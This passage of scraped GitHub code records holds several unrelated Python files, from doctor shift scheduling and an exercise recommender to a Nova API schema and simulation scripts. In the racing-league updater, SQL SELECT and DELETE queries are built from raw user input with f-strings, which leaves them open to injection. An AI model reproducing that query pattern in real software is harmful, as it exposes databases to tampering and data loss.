2\n\t\telse:\n\t\t\tself.count = 1\n\t\tself.jobs = ['']*6#np.zeros(5) # The array is for jobs scheduling => needs to filled with dr's id\n\t\tself.wards = ['A','B','C','D','E','I']\n\t\tself.date = date\n\t\t\t\t\n\t\t\n#==============================================================\n\ndr_list = list()\nworkingDay_list = list()\n\ndef parseCSV(filename):\n\t# here to read the file and do the parsing\n\twith open(filename, newline='') as csvfile:\n\t\trows = list(csv.reader(csvfile))\n\t\tprint(rows[2])\n\t\t\n\n\t\t#drDict = dict(zip(rows[0], rows[1])\n\t\t_dr_list = zip(rows[0], rows[1], rows[2])\n\t\t#print(drDict)\n\t\t#for dr_id, remaining_pts in drDict.items():\n\t\tfor dr_id, remaining_pts, s_rule in _dr_list:\n\t\t\tward_arr = s_rule.split(',')\n\t\t\tprint(dr_id, remaining_pts, ward_arr)\n\t\t\tif dr_id != '':\n\t\t\t\tdr_list.append(Doctor(dr_id, int(remaining_pts), ward_arr))\n\t\t#print(dr_list)\n#\tdr_list.append(Doctor()) # Todo: fill the dr info\n#\td1 = datetime.date(2021, 9, 1);\n#\td2 = datetime.date(2021, 9, 30);\n#\tdelta = d2 - d1\n#\tfor i in range(delta.days + 1):\n#\t\td_tmp = d1 + datetime.timedelta(days=i)\n#\t\tworkingDay_tmp = WorkingDay(d_tmp)\n#\t\tprint(\"date: %s, weekday: %d, count %d, jobs %s\" % (d_tmp, d_tmp.weekday(), workingDay_tmp.count, workingDay_tmp.arr))\n\n# create the working day list\ndef createWDList(year, month):\n\tndays = (datetime.date(year, month+1, 1) - datetime.date(year, month, 1)).days\n\td1 = datetime.date(year, month, 1)\n\td2 = datetime.date(year, month, ndays)\n\tdelta = d2 - d1\n\n\tprint(\"year=%d, month=%d, ndays=%d\" %(year, month, ndays))\n\tfor i in range(ndays):\n\t\tworkingDay_list.append(WorkingDay(d1+datetime.timedelta(days=i)))\n\tfor item in workingDay_list:\n\t\tprint (\"item.date :%s, item.count:%d\" %(item.date, item.count))\n\t\n#print(workingDay_list)\n\ndef findDrWithHighestPoint(dr_list):\n\thighestPoint = 0\n\tid_of_the_dr = 0\n#\tcandidateDr\n\tfor dr in dr_list:\n\t\tif(dr.get_point() > 0 and dr.get_point() > highestPoint):\n#\t\t\tcandidateDr = dr\n\t\t\thighestPoint = dr.get_point()\n\t\t\tid_of_the_dr = dr.get_id()\n\treturn id_of_the_dr\n\ndef fitRule(dr, ward):\n\tfor ok_ward in dr.special_rule:\n\t\tif ok_ward == ward:\n\t\t\treturn ward\n\n\treturn None\ndef findDrWithHighestPoint_fitRule(dr_list, ward):\n\thighestPoint = 0\n\tid_of_the_dr = 0\n#\tcandidateDr\n\tfor dr in dr_list:\n\t\tok_ward = fitRule(dr, ward)\n\t\tif(dr.get_point()> 0 and dr.get_point() > highestPoint and ok_ward): # TODO: arrange guys with higher points\n#\t\tif(ok_ward):\t\t\t\n#\t\t\tcandidateDr = dr\n\t\t\thighestPoint = dr.get_point()\n\t\t\tid_of_the_dr = dr.get_id()\n\treturn id_of_the_dr\n\ndef getDrFromList(dr_id):\n\tfor dr in dr_list:\n\t\tif(dr.get_id() == dr_id):\n\t\t\treturn dr\n\t\t\n\ndef fillWorkingDay(workingDay):\n\tfor i in range(len(workingDay.jobs)):\n#\tfor job in workingDay.jobs:\n#\t\t_id = findDrWithHighestPoint(dr_list)\n\t\t_id = findDrWithHighestPoint_fitRule(dr_list, workingDay.wards[i])\n\t\tprint(\"id=%s, ward=%s\" %(_id, workingDay.wards[i]) )\n\t\tif(_id != 0):\n\t\t\tgetDrFromList(_id).point -= workingDay.count\n\t\t\tworkingDay.jobs[i] = _id\n\t\t\tprint(_id)\n\tfor i in range(len(workingDay.jobs)):\n\t\tif(workingDay.jobs[i] == ''):\n\t\t\t_id = findDrWithHighestPoint(dr_list)\n\t\t\tgetDrFromList(_id).point -= workingDay.count\n\t\t\tworkingDay.jobs[i] = _id\n\ndef schedule(dr_list, wd_list):\n\tfor wd in wd_list:\n\t\tprint(wd.date, wd.count)\n\t\tfillWorkingDay(wd)\n\t\tprint(wd.jobs)\n\t\n\t\t\t\ndef showDrList():\n\tfor dr in dr_list:\n\t\tprint(dr.get_id(), dr.get_point())\n\ndef createCSVoutput(filePos):\n\twith open(filePos, 'w', newline='', encoding='UTF8') as csvfile:\n\t\twriter = csv.writer(csvfile)\n\n\t\t#first row\n\t\tid_row = ['Doctor_ID']\n\t\tfor dr in dr_list:\n\t\t\tid_row.append(dr.get_id())\n\t\twriter.writerow(id_row)\n\n\t\t#date\n\t\tfor wd in workingDay_list:\n\t\t\tdate_row = [wd.date]\n\t\t\tfor dr in dr_list:\n\t\t\t\t_id = dr.get_id()\n\t\t\t\tif _id == wd.jobs[0]:\n\t\t\t\t\tdate_row.append(wd.wards[0])\n\t\t\t\telif _id == wd.jobs[1]:\n\t\t\t\t\tdate_row.append(wd.wards[1])\n\t\t\t\telif _id == wd.jobs[2]:\n\t\t\t\t\tdate_row.append(wd.wards[2])\n\t\t\t\telif _id == wd.jobs[3]:\n\t\t\t\t\tdate_row.append(wd.wards[3])\n\t\t\t\telif _id == wd.jobs[4]:\n\t\t\t\t\tdate_row.append(wd.wards[4])\n\t\t\t\telif _id == wd.jobs[5]:\n\t\t\t\t\tdate_row.append(wd.wards[5])\t\n\t\t\t\telse:\n\t\t\t\t\tdate_row.append('')\n\t\t\twriter.writerow(date_row)\n\t\t\n\t\tremainingPoint_row = ['point left']\n\t\tfor dr in dr_list:\n\t\t\tremainingPoint_row.append(dr.get_point())\n\t\twriter.writerow(remainingPoint_row)\n\t\n\t\n\t\t\n\ndef main():\n#\tdr = Doctor(3);\n#\ttd = WorkingDay(datetime.date.today())\n#\twend = WorkingDay(datetime.datetime(2021,9,19))\n#\tprint (dr.get_point());\n#\tprint (datetime.date.today().weekday())\n#\tprint (datetime.datetime(2021,9,20).weekday())\n#\tprint (\"today has %d count\" % td.count)\n#\tprint (\"2021.9.19 has %d count\" % wend.count)\n\tparseCSV(\"data/dr-data-nov.csv\")\n\tcreateWDList(2021,11)\n\tfor doctor in dr_list:\n\t\tprint(doctor.get_id(), doctor.get_point())\n\tschedule(dr_list, workingDay_list)\n\tshowDrList()\n\tcreateCSVoutput(\"output/nov-output.csv\")\n\n# main function starts here\nmain()\n\n\n","repo_name":"howard-hsien/hospital-scheduling-system","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37798606041","text":"from calendar import c\nimport connectserver\nimport upload_racedirector\n\ndef update_racedirector():\n db = connectserver.connectserver(\"server.json\", \"league\")\n cursor = db.cursor()\n\n # first search and delete the original result\n while True:\n try:\n race = input(\"请输入比赛站名(同时支持中英文), 输入q回到主菜单:\")\n if race == \"q\" or race == \"Q\":\n break\n group = input(\"请选择组别, 输入q回到主菜单:\")\n if group == 'q' or group == 'Q':\n break\n\n query = f'SELECT CaseNumber, CaseDate, raceDirector.driverGroup, GP, raceCalendar.GP_CHN \\\n FROM raceDirector JOIN raceCalendar \\\n ON raceDirector.GP = raceCalendar.GP_ENG \\\n AND raceDirector.driverGroup = raceCalendar.driverGroup \\\n WHERE driverName != \"Race Director\" AND \\\n raceDirector.driverGroup = \"{group}\" AND \\\n (raceCalendar.GP_CHN = \"{race}\" OR raceCalendar.GP_ENG = \"{race}\");'\n cursor.execute(query)\n result = cursor.fetchall()\n if len(result) == 0:\n raise AttributeError(\"没有当场比赛的判罚记录,请重新输入正确的选项\\n\")\n \n racedesc = f'{group} {result[0][4]} {result[0][3]}'\n test = input(f'你选择了 “{racedesc}”,一共找到{len(result)}条判罚记录\\n按Enter以继续,输入q回到上一级\\n')\n if test == 'q' or test == 'Q':\n raise ValueError()\n \n query = f'DELETE FROM raceDirector WHERE driverName != \"Race Director\" \\\n AND driverGroup = \"{group}\" AND GP = \"{result[0][3]}\";'\n cursor.execute(query)\n db.commit()\n\n test = input(\"原比赛判罚记录已清除,按Enter重新上传排位赛数据,输入q回到主菜单\\n\")\n if test == 'q' or test == 'Q':\n break\n\n upload_racedirector.upload_racedirector()\n break\n\n except Exception as e:\n print(str(e))\n","repo_name":"STevenL1i/AFR-AutoRankingProject","sub_path":"Archive/v6.01.1(发展联盟)/src/update_racedirector.py","file_name":"update_racedirector.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9004291901","text":"tests = int(input())\n\nwhile tests > 0:\n min_ans = 6\n max_ans = 1\n tests = tests - 1\n size = int(input())\n speed = [int(x) for x in input().split()]\n\n meetings = []\n for i in range(0, size - 1):\n for j in range(i + 1, size):\n if (speed[i] != speed[j]):\n t = float(i - j) / float(speed[j] - speed[i])\n if t >= 0:\n meetings.append((t, i, j))\n\n meetings.sort(key = lambda x: x[0])\n\n for inf in range(0, size):\n pos = [x for x in range(1, size + 1)]\n infected = [False for x in range(0, size)]\n infected[inf] = True\n\n for meeting in meetings:\n infected[meeting[1]] = (infected[meeting[1]] or infected[meeting[2]])\n infected[meeting[2]] = infected[meeting[1]]\n\n count = 0\n for m in range(0, size):\n if infected[m]:\n count = count + 1\n\n if count < min_ans:\n min_ans = count\n\n if count > max_ans:\n max_ans = count\n\n print(str(min_ans) + ' ' + str(max_ans))\n","repo_name":"adit-t/competitive-programming","sub_path":"codechef/long-challenges/2020/sept/covid19b.py","file_name":"covid19b.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28560118527","text":"import copy\n\nfrom nova.api.validation import parameter_types\n\n\ncreate = {\n 'type': 'object',\n 'properties': {\n 'cell': {\n 'type': 'object',\n 'properties': {\n 'name': parameter_types.cell_name,\n 'type': {\n 'type': 'string',\n 'enum': ['parent', 'child'],\n },\n\n # NOTE: In unparse_transport_url(), a url consists of the\n # following parameters:\n # \"qpid://:@:/\"\n # or\n # \"rabiit://:@:/\"\n # Then the url is stored into transport_url of cells table\n # which is defined with String(255).\n 'username': {\n 'type': 'string', 'maxLength': 255,\n 'pattern': '^[a-zA-Z0-9-_]*$'\n },\n 'password': {\n # Allow to specify any string for strong password.\n 'type': 'string', 'maxLength': 255,\n },\n 'rpc_host': parameter_types.hostname_or_ip_address,\n 'rpc_port': parameter_types.tcp_udp_port,\n 'rpc_virtual_host': parameter_types.hostname_or_ip_address,\n },\n 'required': ['name'],\n 'additionalProperties': False,\n },\n },\n 'required': ['cell'],\n 'additionalProperties': False,\n}\n\n\ncreate_v20 = copy.deepcopy(create)\ncreate_v20['properties']['cell']['properties']['name'] = (parameter_types.\n cell_name_leading_trailing_spaces)\n\n\nupdate = {\n 'type': 'object',\n 'properties': {\n 'cell': {\n 'type': 'object',\n 'properties': {\n 'name': parameter_types.cell_name,\n 'type': {\n 'type': 'string',\n 'enum': ['parent', 'child'],\n },\n 'username': {\n 'type': 'string', 'maxLength': 255,\n 'pattern': '^[a-zA-Z0-9-_]*$'\n },\n 'password': {\n 'type': 'string', 'maxLength': 255,\n },\n 'rpc_host': parameter_types.hostname_or_ip_address,\n 'rpc_port': parameter_types.tcp_udp_port,\n 'rpc_virtual_host': parameter_types.hostname_or_ip_address,\n },\n 'additionalProperties': False,\n },\n },\n 'required': ['cell'],\n 'additionalProperties': False,\n}\n\n\nupdate_v20 = copy.deepcopy(create)\nupdate_v20['properties']['cell']['properties']['name'] = (parameter_types.\n cell_name_leading_trailing_spaces)\n\n\nsync_instances = {\n 'type': 'object',\n 'properties': {\n 'project_id': parameter_types.project_id,\n 'deleted': parameter_types.boolean,\n 'updated_since': {\n 'type': 'string',\n 'format': 'date-time',\n },\n },\n 'additionalProperties': False,\n}\n","repo_name":"BU-NU-CLOUD-SP16/Trusted-Platform-Module-nova","sub_path":"nova/api/openstack/compute/schemas/cells.py","file_name":"cells.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"21861580134","text":"import shutil\nfrom instrumentdatabaseapi import instrumentdatabaseapi as API\nfrom SimExLite.WavefrontData import WPGFormat\nimport wpg\nfrom wpg import wpg_uti_wf, srwlib\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\n\n\nrepo = API.Repository(local_repo=\".\")\n\n# import the units\nimport pint\n\nureg = pint.get_application_registry()\n\ninstrument_name = \"SPB-SFX\"\nflavour = \"\"\n# flavour = \"AGIPD_detector\"\n# flavour = \"JUNGFRAU_detector\"\n\nbase_dir = f\"./SPB_SFX_instrument_{flavour}\"\n\nrepo.ls_flavours(\"EuXFEL\", instrument_name, \"HEAD\", \"simex-lite\")\n\n# SPB_SFX = repo.load(\"EuXFEL\", instrument_name, \"HEAD\", \"simex-lite\")\nSPB_SFX = repo.load(\"EuXFEL\", instrument_name, \"HEAD\", \"simex-lite\", flavour)\n\n\nprint(SPB_SFX.master)\n\n# shutil.rmtree(\"./SPB_SFX_instrument\", ignore_errors=True)\nshutil.rmtree(base_dir, ignore_errors=True)\n\n# SPB_SFX.set_instrument_base_dir(\"./SPB_SFX_instrument\")\nSPB_SFX.set_instrument_base_dir(base_dir)\n\nSPB_SFX.set_sample_by_file(\n \"institutes/EuXFEL/instruments/SPB-SFX/HEAD/simex-lite/2nip.pdb\"\n)\nSPB_SFX.master[\"photon_energy\"] = 6000\n# SPB_SFX.master[\"energy\"] = 20000\n\nprint(SPB_SFX.master)\nprint(SPB_SFX)\n\nSPB_SFX.run()\n\n# Visualization\nmwf = wpg.Wavefront()\nsource_WPG = (\n SPB_SFX.calculators[\"gaussian_source\"]\n .output.to_list()[0]\n .write(\"source.h5\", WPGFormat)\n)\nmwf.load_hdf5(source_WPG.filename)\nwpg_uti_wf.plot_intensity_map(mwf)\nwpg_uti_wf.integral_intensity(mwf)\nsrwlib.srwl.SetRepresElecField(mwf._srwl_wf, \"f\")\nwpg_uti_wf.integral_intensity(mwf)\n\nmwf = wpg.Wavefront()\nprop_WPG = SPB_SFX.calculators[\"WPGCalculator\"].output.to_list()[0]\nmwf.load_hdf5(prop_WPG.filename)\nwpg_uti_wf.plot_intensity_map(mwf)\nwpg_uti_wf.integral_intensity(mwf)\nsrwlib.srwl.SetRepresElecField(mwf._srwl_wf, \"f\")\nwpg_uti_wf.integral_intensity(mwf)\n\ndiffr = SPB_SFX.calculators[\"Diffr_calculator\"].output.to_list()[0]\ndiffr_data = diffr.get_data()\nfig, ax = plt.subplots(2, 5, figsize=(18, 8))\nfor i in range(2):\n for j in range(5):\n ax[i, j].imshow(diffr_data[\"img_array\"][j + i * 5], norm=colors.LogNorm())\n ax[i, j].get_xaxis().set_visible(False)\n ax[i, j].get_yaxis().set_visible(False)\n\nplt.tight_layout()\nplt.show()\n","repo_name":"PaNOSC-ViNYL/instrument_database","sub_path":"mysim_simex-lite.py","file_name":"mysim_simex-lite.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17270626927","text":"#Script_json_maker0.3\nimport json\n\ncodecov=\"-\"\nBranchcov=\"-\"\nvulndetected=\"-\"\ntimetaken=\"-\"\ntimetrigger=\"-\"\nTransactions = \"-\"\nFile_path= \"coverage_json.json\"\n\ndef coverage_json_maker():\n Dict={}\n Dict=dict({\"Code_Coverage\":codecov,\"Branch_Coverage\":Branchcov,\"No._of_Transactions\":Transactions, \"Time_Taken\": timetaken,\"Time_trigger\": timetrigger})\n with open(File_path, 'a', encoding=\"utf-8\") as file:\n x = json.dumps(Dict, indent=4)\n file.write(x + '\\n')","repo_name":"sunbeam891/Smart_contract_fuzzing","sub_path":"scripts/coverage_json.py","file_name":"coverage_json.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8570879097","text":"import scullery.workers\nscullery.workers.start()\n\nimport scullery.iceflow\nimport scullery.fluidsynth\n\nimport os,time\n\nimport unittest,random,gc\n\nclass Player(scullery.iceflow.GstreamerPipeline):\n def __init__(self,file):\n scullery.iceflow.GstreamerPipeline.__init__(self,realtime=False)\n\n self.src = self.addElement('filesrc',location=file)\n\n #This bin autodetects and decodes basically any type of media\n #It is special cased, anything onnected to it is actually connected on-demand as needed\n decodebin = self.addElement('decodebin')\n\n\n self.addElement('audioconvert',connectToOutput=decodebin)\n self.addElement('audioresample')\n\n self.fader = self.addElement('volume', volume=1)\n self.sink = self.addElement('autoaudiosink') \n\n\nclass TestAudio(unittest.TestCase):\n\n def test_z_no_segfaults(self):\n #Test for segfault-ery\n for i in range(0,100):\n p=Player(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"media\",\"Brothers Unite.ogg\"))\n p.start()\n time.sleep(0.01*random.random())\n p.seek(0.3)\n time.sleep(0.01*random.random())\n p.setProperty(p.fader, \"volume\",0.1)\n p.stop()\n #Ensure nothing bad happens setting the volume after stopping\n p.setProperty(p.fader, \"volume\",1)\n del p\n gc.collect()\n for i in range(150):\n time.sleep(0.1)\n if len(scullery.iceflow.pipes)==0:\n break\n gc.collect()\n\n self.assertEqual(len(scullery.iceflow.pipes), 0)\n \n def test_seekpastend(self):\n p=Player(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"media\",\"Brothers Unite.ogg\"))\n p.start()\n time.sleep(0.01*random.random())\n p.seek(99999)\n time.sleep(0.01*random.random())\n p.setProperty(p.fader, \"volume\",1)\n p.stop()\n #Ensure nothing bad happens setting the volume after stopping\n p.setProperty(p.fader, \"volume\",1)\n del p\n gc.collect()\n for i in range(150):\n time.sleep(0.1)\n if len(scullery.iceflow.pipes)==0:\n break\n gc.collect()\n\n self.assertEqual(len(scullery.iceflow.pipes), 0)","repo_name":"EternityForest/scullery","sub_path":"tests/testGstStability.py","file_name":"testGstStability.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"13155109847","text":"import random\r\nimport pandas as pd\r\n\r\n# Read exercise data from Excel file\r\nexercise_data = pd.read_excel('Book1.xlsx')\r\n\r\n# Create dictionaries and lists to store exercises for each level\r\nexercise_lists = {}\r\ncompleted_exercises1_3 = []\r\ncompleted_exercises3_4 = []\r\ncompleted_exercises4_5 = []\r\nrecommended_exercises1_3b = []\r\nrecommended_exercises3_4b=[]\r\nrecommended_exercises4_5b=[]\r\nrecommended_exercises1_3i = []\r\nrecommended_exercises3_4i=[]\r\nrecommended_exercises4_5i=[]\r\nrecommended_exercises1_3a = []\r\nrecommended_exercises3_4a=[]\r\nrecommended_exercises4_5a=[]\r\n\r\n# Loop through the exercise data and append exercises to the appropriate exercise list\r\nfor index, row in exercise_data.iterrows():\r\n level = row['Level']\r\n exercise = row['Exercise']\r\n if level not in exercise_lists:\r\n exercise_lists[level] = []\r\n exercise_lists[level].append(exercise)\r\n\r\n# Shuffle the exercise lists for each level\r\n#for level in exercise_lists:\r\n #random.shuffle(exercise_lists[level])\r\n\r\n# Create separate lists for each level\r\nlevel_1_exercises = exercise_lists.get(1, [])\r\nlevel_2_exercises = exercise_lists.get(2, [])\r\nlevel_3_exercises = exercise_lists.get(3, [])\r\nlevel_4_exercises = exercise_lists.get(4, [])\r\nlevel_5_exercises = exercise_lists.get(5, [])\r\n\r\nlevel1_3_exercises = level_1_exercises + level_3_exercises\r\nlevel3_4_exercises = level_3_exercises + level_4_exercises\r\nlevel4_5_exercises = level_4_exercises + level_5_exercises\r\n\r\n\r\n# Loops to recommend exercises\r\nfor i in range(1,76):\r\n if (i % 5 == 0 and i !=1) :\r\n recommended_exercises1_3b.append(random.choice(level_2_exercises))\r\n else:\r\n recommended_exercises1_3b.append(random.choice(level1_3_exercises))\r\n\r\nfor i in range(1,151):\r\n if (i % 5 == 0 and i !=1) :\r\n recommended_exercises3_4b.append(random.choice(level_2_exercises))\r\n else:\r\n recommended_exercises3_4b.append(random.choice(level3_4_exercises))\r\n\r\nfor i in range(1,226):\r\n if (i % 5 == 0 and i !=1) :\r\n recommended_exercises4_5b.append(random.choice(level_2_exercises))\r\n else:\r\n recommended_exercises4_5b.append(random.choice(level4_5_exercises))\r\n\r\n#loops for Intermediate type\r\nfor i in range(1,121):\r\n if (i % 5 == 0 and i !=1) :\r\n recommended_exercises1_3i.append(random.choice(level_2_exercises))\r\n else:\r\n recommended_exercises1_3i.append(random.choice(level1_3_exercises))\r\n\r\nfor i in range(1,241):\r\n if (i % 5 == 0 and i !=1) :\r\n recommended_exercises3_4i.append(random.choice(level_2_exercises))\r\n else:\r\n recommended_exercises3_4i.append(random.choice(level3_4_exercises))\r\n\r\nfor i in range(1,361):\r\n if (i % 5 == 0 and i !=1) :\r\n recommended_exercises4_5i.append(random.choice(level_2_exercises))\r\n else:\r\n recommended_exercises4_5i.append(random.choice(level4_5_exercises))\r\n#loops for Intermediate type\r\nfor i in range(1,151):\r\n if (i % 5 == 0 and i !=1) :\r\n recommended_exercises1_3a.append(random.choice(level_2_exercises))\r\n else:\r\n recommended_exercises1_3a.append(random.choice(level1_3_exercises))\r\nfor i in range(1,301):\r\n if (i % 5 == 0 and i !=1) :\r\n recommended_exercises3_4a.append(random.choice(level_2_exercises))\r\n else:\r\n recommended_exercises3_4a.append(random.choice(level3_4_exercises))\r\n\r\nfor i in range(1,451):\r\n if (i % 5 == 0 and i !=1) :\r\n recommended_exercises4_5a.append(random.choice(level_2_exercises))\r\n else:\r\n recommended_exercises4_5a.append(random.choice(level4_5_exercises))\r\n\r\n\r\ndef questionaire(exercise,list_name,completed_exercise_group):\r\n answer = input(\"Could you do the exercise? (Provide yes or no) \")\r\n if answer == \"yes\" or answer == \"Yes\" or answer == \"yeah\" or answer == \"Yeah\":\r\n print(\"That's great\")\r\n completed_exercise_group.append(exercise) # Append exercise to completed exercises list\r\n elif answer == \"no\" or answer == \"No\" or answer == \"Nope\" or answer == \"nope\":\r\n print(\"No Problem.Please answer carefully:\")\r\n ans2=input(\"Why weren't you able to do the exercise? e.g. it's painful/it's too heavy: \")\r\n second_popup(list_name,completed_exercise_group)\r\n\r\n\r\n\r\ndef second_popup(list_name,completed_exercise_group):\r\n if len(completed_exercise_group)!=0:\r\n latest_exercise = completed_exercise_group[-1]\r\n for key, value in exercise_lists.items():\r\n if latest_exercise in value:\r\n level=key\r\n # print(f\"Latest element corresponds to key: {level}\")\r\n # Exit the loop after finding the corresponding key\r\n # Select an exercise from value list that is not in completed_exercises1_3 list\r\n \r\n selected_exercise = None\r\n for exercise in value:\r\n if exercise not in completed_exercise_group:\r\n selected_exercise = exercise\r\n print(f\"If you weren't able to do the previous exercise. Here's another recommendation for you: {selected_exercise }\")\r\n questionaire(selected_exercise,list_name,completed_exercise_group)\r\n break\r\n #break # Exit the loop after finding the selected exercise\r\n else:\r\n if level in exercise_lists:\r\n exercise_list = exercise_lists[level]\r\n # Select a random exercise from the same level\r\n random_exercise = random.choice(exercise_list)\r\n print(f\"You can repeat this exercise: {random_exercise}\")\r\n questionaire(random_exercise,list_name,completed_exercise_group)\r\n break # Exit the loop if no available exercises are found\r\n\r\n else:\r\n \r\n string = list_name\r\n prefix = \"completed_exercises\"\r\n level = string[len(prefix)] # level is the digit immediately following the prefix\r\n print(f\"string:{string}\")\r\n print(f\"level:{level}\") \r\n if int(level) in exercise_lists:\r\n exercise_list = exercise_lists[int(level)]\r\n #Select a random exercise from the same level\r\n random_exercise = random.choice(exercise_list)\r\n print(f\"You can try this one: {random_exercise}\")\r\n questionaire(random_exercise,list_name,completed_exercise_group)\r\n\r\n\r\ndef recommender(criterion,programs,list_name,recommended_exercise_group,completed_exercise_group):\r\n count=0\r\n for i, exercise in enumerate(recommended_exercise_group, 1):\r\n \r\n if i % criterion ==1 and count #\n# Creation Date : August 29, 2019 #\n# #\n#######################################################################################\n\nimport os\n\nif __name__ == \"__main__\":\n\n try:\n file_path = input(\"Enter path to file: \")\n print(f\"\\nThe size of {file_path} is: {os.path.getsize(file_path)} bytes\")\n\n except FileNotFoundError as fileNotFound:\n print(f\"Path is not valid file.\\n{fileNotFound}\")\n","repo_name":"ivenpoker/Python-Projects","sub_path":"Projects/Online Workouts/w3resource/Basic - Part-I/program-87.py","file_name":"program-87.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25434701607","text":"import sys\n\nn = int(sys.stdin.readline())\na = [int(i) for i in input().split()]\nlm = min(a)\nres = sys.maxsize\nfor i in range(1, lm+1):\n fl = 0\n sum = 0\n for j in range(n):\n if a[j]//i == a[j]//(i+1):\n fl = 1\n break\n if fl == 0:\n for j in range(n):\n sum += (a[j]//(i+1) + 1)\n res = min(sum, res)\nprint(res)\n \n","repo_name":"ducanhnguyen07/Python","sub_path":"day_so_tuong_thich.py","file_name":"day_so_tuong_thich.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22203675500","text":"#!/bin/python3\n\n\"\"\"\nPearson correlation coefficient\n\nInput:\n2 7\n0.18 0.89 109.85\n1.0 0.26 155.72\n0.92 0.11 137.66\n0.07 0.37 76.17\n0.85 0.16 139.75\n0.99 0.41 162.6\n0.87 0.47 151.77\n4\n0.49 0.18\n0.57 0.83\n0.56 0.64\n0.76 0.18\n\nOutput:\n105.22\n142.68\n132.94\n129.71\n\n\"\"\"\nfrom sklearn import linear_model\n\nif __name__ == '__main__':\n m, n = list(map(int, input().split()))\n \n x = []\n y = []\n \n for _ in range(n):\n x_y = list(map(float, input().rstrip().split()))\n x.append(x_y[:m])\n y.append(x_y[m])\n \n #print(x)\n #print(y)\n lm = linear_model.LinearRegression()\n lm.fit(x, y)\n a = lm.intercept_\n b = lm.coef_\n #print(a, b[0], b[1])\n \n q = int(input()) \n fs_x = []\n for _ in range(q):\n fs_x = list(map(float, input().rstrip().split()))\n fs_y = a + sum([b[i]*fs_x[i] for i in range(m)])\n print(\"{:.2f}\".format( fs_y ))\n \n \n \n ","repo_name":"VinhMaiVy/learning-python","sub_path":"src/10 days of stats/s10_multiple_linear_regression.py","file_name":"s10_multiple_linear_regression.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"10960661712","text":"import numpy as np\r\nimport sim\r\nimport math as ma\r\n\r\nn = 500\r\nnval = 100\r\np = 100\r\ns = 50\r\nrho = [0.1, 0.4, 0.7]\r\nsnr = np.logspace(ma.log10(0.05), ma.log10(10), num=12, base=10)\r\nbetatype = [1, 2, 3, 4]\r\nmethod = ['susie', 'Lassocv', 'step']\r\nparameters = ['risk', 'test_err', 'nzs', 'prop']\r\nseed = 0\r\nnrep = 20\r\nL = 50\r\n\r\n\r\ndata = np.zeros((len(method), len(rho), len(betatype), len(snr), len(parameters)))\r\n\r\n\r\nfor j in range(len(rho)):\r\n for k in range(len(betatype)):\r\n for l in range(len(snr)):\r\n print(l)\r\n fit = sim.sim(n=n, nval=nval, p=p, s=s, rho=rho[j], snr=snr[l], beta_type=betatype[k], nrep=nrep, l=L)\r\n for i in range(len(method)):\r\n output, std = fit.sim_method(method[i], seed=seed)\r\n for m in range(len(parameters)):\r\n data[i, j, k, l, m] = output[parameters[m]]\r\n\r\nnp.savez('data_new4.npz', data=data, snr=snr, rho=rho, betatype=betatype, method=method, parameters=parameters)\r\n","repo_name":"whitegugus/Susie","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34887576952","text":"# Learn more about ASCII coding. Make a scrypt creating simple coded message, each letter save as ASCII number.\n# Get familiar with ord() and chr() methods. Remember to add separator.\n# Write second script, which decrypt Your massage.\ndef main():\n \"\"\"Main function of the script.\"\"\"\n print(f'Welcome')\n print(f'This is a short massage encrypter.')\n input(f'Press enter to continue...')\n menu()\n\n\ndef menu():\n \"\"\"This function gives option to save coded massage into a specific file\"\"\"\n user_decision = []\n user_options = ['y', 'n']\n while user_decision not in user_options:\n user_decision = input(f'Do You want to save Your massage into specific or standard file? [Y/N]-> ').lower()\n if user_decision == 'y':\n user_filename = input(f'Type the name of Your file -> ')\n else:\n massage_output(input_massage(), 'coded')\n return\n return massage_output(input_massage(), user_filename)\n\n\ndef input_massage():\n \"\"\"Take a massage from User to be encoded and encode it.\"\"\"\n massage = input(f'Type Your massage to be encoded ->')\n coded_massage = []\n for i in range(len(massage)):\n coded_massage.append(ord(massage[i]))\n coded_string = ''\n for i in range(len(coded_massage)):\n coded_string += str(coded_massage[i]) + \",\"\n return coded_string\n\n\ndef massage_output(coded_string, filename):\n \"\"\"Save coded massage to the txt file.\"\"\"\n with open(f'./{filename}.txt', '+w') as file:\n file.write(str(coded_string))\n print(f'The massage was encrypted and saved in a file named {filename}.txt')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Adam-Kolowrocki/New_beginning","sub_path":"07_file_operations/files_09_coder.py","file_name":"files_09_coder.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29689479985","text":"from heapq import heappop,heappush,heapify\n\ndef solution(n, works):\n # 원소 부호를 반대로 work 리스트로 만들어주고\n work = [-i for i in works]\n # heapify로 리스트를 heap구조로 만들어준다\n heapify(work)\n \n # n번 빼야하므로 n번 반복\n for _ in range(n):\n # 첫 원소를 빼서 